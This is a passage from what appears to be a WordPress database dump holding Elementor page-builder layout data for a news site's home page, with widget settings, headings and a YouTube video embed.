"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zawfnfe\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1391,485,'_elementor_version','0.4'),(1392,485,'_elementor_css','a:3:{s:4:\"time\";i:1508918052;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1393,360,'_oembed_cb74d4022bdef5f2d2b44a0def87c845','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/0jeXbexRihs?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1394,360,'_oembed_time_cb74d4022bdef5f2d2b44a0def87c845','1508918992'),(1396,486,'_elementor_edit_mode','builder'),(1397,486,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_i